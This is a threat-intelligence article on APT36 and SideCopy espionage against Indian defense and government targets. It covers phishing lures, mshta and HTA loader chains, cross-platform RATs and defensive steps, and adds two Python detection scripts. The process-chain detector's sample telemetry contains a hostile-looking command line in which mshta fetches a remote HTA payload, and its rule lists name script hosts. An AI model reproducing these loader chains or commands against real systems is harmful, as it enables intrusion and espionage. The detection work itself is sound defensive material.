APT36 & SideCopy: Cross-Platform Espionage Against Indian Strategic Targets

  • Javier Conejo del Cerro
  • 15 minutes ago
  • 3 min read

Indian defense entities, government-aligned organizations, research institutions, and critical infrastructure operators are facing coordinated cross-platform espionage campaigns attributed to Pakistan-linked threat clusters APT36 (Transparent Tribe) and SideCopy.

Rather than introducing radically new techniques, these actors are refining well-established tradecraft: phishing-led initial access, multi-stage loaders, memory-resident execution, and stealth-optimized remote access trojans (RATs).

Their current toolkit—Geta RAT, Ares RAT, and DeskRAT—demonstrates deliberate cross-platform capability across Windows and Linux environments, reinforcing a long-term intelligence collection objective rather than disruptive sabotage.


Phase 1: Initial Access & Social Engineering 


The campaigns begin with carefully crafted phishing emails targeting defense and government-adjacent personnel. These lures frequently impersonate official communications or defense-themed documents to increase credibility within India’s strategic ecosystem.

Delivery mechanisms include:

  • Malicious LNK shortcut files

  • Embedded download links to attacker infrastructure

  • ELF binaries targeting Linux systems

  • Rogue PowerPoint Add-In files with embedded macros

Once opened, these artifacts start the execution chain: on Windows, typically by invoking a trusted, signed utility such as mshta.exe to retrieve and execute a remote HTA payload; on Linux, by launching a Go-based binary.

Because the first stages run inside legitimate system tools, they leave few obvious indicators and blend into normal administrative workflows, which is what makes this tradecraft hard to catch with file-based detection alone.


Phase 2: Multi-Stage Loader Execution & Payload Deployment 


After initial execution, the attack transitions into a layered loader process:

  • HTA files containing JavaScript decrypt embedded DLL payloads

  • Decoy PDFs are written to disk to reduce suspicion

  • Hard-coded C2 connections are established

  • The loader checks for installed security products and adjusts its persistence mechanism accordingly

Depending on the target platform, different RAT families are deployed:


Windows Path


  • Geta RAT

  • DeskRAT (Golang-based, delivered via malicious PowerPoint Add-Ins)


Linux Path


  • Go binary dropper

  • Shell script execution

  • Deployment of Python-based Ares RAT

This modular branching demonstrates operational maturity and environment awareness, ensuring the correct payload aligns with the victim’s operating system.
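One way to turn the chains in Phases 1 and 2 into detection logic, written for this page as an added example (it is not code from the article or from the vendor research it summarises): it walks parent/child relationships in constructed process-creation records and flags the three chains described above, explorer.exe launching mshta.exe with a remote URL (the LNK path), an Office process spawning a script host (the macro / PowerPoint add-in path), and an ELF in a user-writable directory spawning a shell that spawns Python (the Linux path). The field names, hosts, paths and addresses are assumptions, not a real product schema.

```python
"""Behaviour-chain detection for the Windows and Linux loader chains above.

Added example, not code from the article or from the vendors it summarises.
The records below are constructed to resemble process-creation telemetry
(Sysmon Event ID 1 on Windows, exec auditing on Linux); the field names and
the sample hosts, paths and addresses are assumptions, not a real schema.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    platform: str    # "windows" or "linux"
    pid: int
    ppid: int
    image: str       # executable path as logged
    cmdline: str


REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe"}
WIN_SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                    "cmd.exe", "rundll32.exe", "regsvr32.exe"}
LINUX_SHELLS = {"sh", "bash", "dash"}
USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either path separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def ancestry(event: ProcEvent, by_pid: dict, depth: int = 4) -> list[ProcEvent]:
    """[event, parent, grandparent, ...] as far as the telemetry can resolve."""
    chain = [event]
    while len(chain) < depth:
        parent = by_pid.get((chain[-1].host, chain[-1].ppid))
        if parent is None:
            break
        chain.append(parent)
    return chain


def detect(events: list[ProcEvent]) -> list[tuple[str, int, str]]:
    """Return (host, pid, rule) for every event that completes a suspicious chain."""
    by_pid = {(e.host, e.pid): e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e, by_pid)
        names = [basename(c.image) for c in chain]   # names[0] is e itself
        parent = names[1] if len(names) > 1 else ""
        if e.platform == "windows":
            # LNK double-click: explorer.exe spawns mshta.exe, which is handed a
            # remote URL so it can fetch the HTA stage from attacker infrastructure.
            if (names[0] == "mshta.exe" and parent == "explorer.exe"
                    and REMOTE_URL.search(e.cmdline)):
                findings.append((e.host, e.pid, "lnk_mshta_remote_hta"))
            # Macro or PowerPoint add-in execution: an Office process spawning a
            # script host or other living-off-the-land binary.
            elif parent in OFFICE_APPS and names[0] in WIN_SCRIPT_HOSTS:
                findings.append((e.host, e.pid, "office_spawns_script_host"))
        elif e.platform == "linux":
            # ELF dropper in a user-writable path -> shell -> Python interpreter
            # (the Ares RAT path). All three links must be visible in telemetry.
            if (names[0].startswith("python") and len(chain) >= 3
                    and names[1] in LINUX_SHELLS
                    and chain[2].image.startswith(USER_WRITABLE)):
                findings.append((e.host, e.pid, "elf_dropper_sh_python"))
    return findings


# Constructed sample telemetry: two malicious chains, one benign per platform.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "windows", 100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws01", "windows", 300, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.10/brief.hta"),          # LNK -> mshta
    ProcEvent("ws01", "windows", 200, 100, r"C:\Program Files\Microsoft Office\POWERPNT.EXE",
              'POWERPNT.EXE "C:\\Users\\a\\Downloads\\agenda.ppam"'),
    ProcEvent("ws01", "windows", 210, 200, r"C:\Windows\System32\wscript.exe",
              "wscript.exe //e:jscript C:\\Users\\a\\AppData\\Local\\Temp\\s.js"),  # add-in
    ProcEvent("ws01", "windows", 400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),                                   # benign admin console
    ProcEvent("srv01", "linux", 5000, 4000, "/tmp/.cache/update", "./update"),
    ProcEvent("srv01", "linux", 5001, 5000, "/usr/bin/sh", "sh /tmp/.cache/run.sh"),
    ProcEvent("srv01", "linux", 5002, 5001, "/usr/bin/python3", "python3 /tmp/.cache/agent.py"),
    ProcEvent("srv01", "linux", 6000, 1, "/usr/bin/bash", "-bash"),
    ProcEvent("srv01", "linux", 6001, 6000, "/usr/bin/python3", "python3 -m pip list"),  # benign
]


def run_sample() -> list[tuple[str, int, str]]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for host, pid, rule in run_sample():
        print(f"{host} pid={pid} {rule}")
```

The point is the chain, not any single image name: mshta.exe with a URL argument is rare in normal administration, an Office process is almost never a legitimate parent of wscript.exe, and a Python process whose grandparent lives in /tmp is worth a look on any server. Against real Sysmon or EDR data the same rules would need tuning (the /home/ prefix in particular will catch developer workstations), but the structure, resolving ancestry first and then matching a sequence, is what "behaviour chains rather than payload signatures" means in practice.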


Phase 3: Persistence, Command & Control, and Data Collection 


Once deployed, the RATs establish persistent remote access and maintain communication with attacker-controlled C2 servers.

Capabilities across the malware families include:

  • System reconnaissance and enumeration

  • Credential harvesting

  • Running arbitrary shell commands

  • Listing and terminating processes

  • Enumerating installed applications

  • Clipboard manipulation (including data replacement)

  • Screenshot capture

  • File system access and manipulation

  • USB device data harvesting

  • Execution of attacker-supplied scripts

  • Continuous C2 communication for long-term operations

The objective is not immediate destruction, but quiet, sustained intelligence collection and operational foothold expansion.


Operational Characteristics


What distinguishes these campaigns is not novelty but refinement:

  • Cross-platform coverage (Windows + Linux)

  • Memory-resident and multi-stage execution

  • Abuse of trusted utilities (mshta, macros, PowerPoint Add-Ins)

  • Regionally trusted infrastructure

  • Defense-themed lure documents

This model enables the actors to operate below the typical detection threshold while maintaining strategic focus on Indian defense and policy sectors.


Defensive Measures 


To mitigate this threat model, organizations should implement layered controls:

  • Harden email gateways with advanced phishing detection

  • Block or strictly restrict macro execution

  • Alert on mshta.exe retrieving remote content and on LNK files arriving by email or inside archives

  • Audit and restrict PowerPoint Add-Ins

  • Deploy cross-platform EDR covering Windows and Linux

  • Monitor outbound traffic for anomalous C2 patterns

  • Enforce least privilege and review legacy permissions

  • Inspect HTA execution and script interpreter abuse

  • Monitor USB device access activity

  • Implement behavioral detection for memory-resident multi-stage loaders


Detection strategies must focus on behavior chains rather than single payload signatures.
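Behaviour over signature applies on the network side as well. The block below, added here as an example rather than taken from the article or from any vendor tool, scores outbound connections per source/destination pair by how regular the gaps between them are, which is how a sleep-interval implant looks in flow logs regardless of which RAT family is behind it. The record format ("ISO timestamp, source, destination:port, bytes") and the addresses are constructed for the example.

```python
"""Periodicity check for outbound connections, as a first-pass C2 beacon detector.

Added example, not code from the article or from any vendor. The flow records
are constructed (the 'ISO-timestamp src dst:port bytes' format is an assumption,
not a real NetFlow/Zeek schema), and the addresses are documentation ranges.
"""
from __future__ import annotations

import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def parse_flows(lines: list[str]) -> list[tuple[datetime, str, str, int]]:
    """Parse one flow per line; malformed lines are skipped rather than fatal."""
    flows = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, sent = parts
        flows.append((datetime.fromisoformat(ts), src, dst, int(sent)))
    return flows


def beacon_candidates(flows, min_conns: int = 6, max_cv: float = 0.15) -> list[dict]:
    """Report (src, dst) pairs whose inter-connection gaps are nearly constant.

    cv is stdev/mean of the gaps. Interactive traffic has irregular gaps; an
    implant that sleeps a fixed interval (even with a little jitter) does not.
    """
    by_pair: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    for ts, src, dst, _ in flows:
        by_pair[(src, dst)].append(ts)
    out = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_conns:
            continue            # too few samples to call it periodic
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue            # duplicate timestamps; nothing to measure
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            out.append({"src": src, "dst": dst, "count": len(stamps),
                        "period_s": round(mean, 1), "cv": round(cv, 3)})
    return out


# Constructed sample: one sleep(60)-style beacon with a few seconds of jitter,
# one browsing session with irregular gaps, and one pair too sparse to judge.
_BASE = datetime(2024, 5, 1, 9, 0, 0)


def _rec(offset_s: int, src: str, dst: str) -> str:
    return f"{(_BASE + timedelta(seconds=offset_s)).isoformat()} {src} {dst} 512"


SAMPLE_FLOW_LINES = (
    [_rec(s, "10.0.0.5", "203.0.113.10:443") for s in (0, 61, 120, 182, 240, 299, 361, 420)]
    + [_rec(s, "10.0.0.5", "198.51.100.20:443") for s in (0, 5, 45, 48, 168, 178, 478)]
    + [_rec(s, "10.0.0.5", "198.51.100.30:443") for s in (0, 60, 120)]
)


def run_sample() -> list[dict]:
    return beacon_candidates(parse_flows(SAMPLE_FLOW_LINES))


if __name__ == "__main__":
    for hit in run_sample():
        print(hit)
```

A low coefficient of variation on its own is not proof: software updaters and monitoring agents also poll on fixed intervals, so the output is a triage list to join against destination reputation, the owning process on the endpoint, and whether the destination is a hard-coded IP rather than a name resolved through DNS.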

APT36 and SideCopy are not reinventing espionage—they are optimizing it. By expanding cross-platform coverage and refining multi-stage delivery pipelines, they ensure resilient, stealth-oriented access into Indian strategic environments. The use of Geta RAT, Ares RAT, and DeskRAT illustrates an ecosystem designed for persistence, reconnaissance, and long-term intelligence collection rather than short-term disruption.


For defenders, the key takeaway is clear: modern espionage campaigns thrive on blending into legitimate workflows. Visibility into script execution chains, cross-platform telemetry, and outbound C2 behavior is essential to disrupt operations that are intentionally engineered to stay quiet.


The threat is not loud. It is deliberate.



Source: The Hacker News
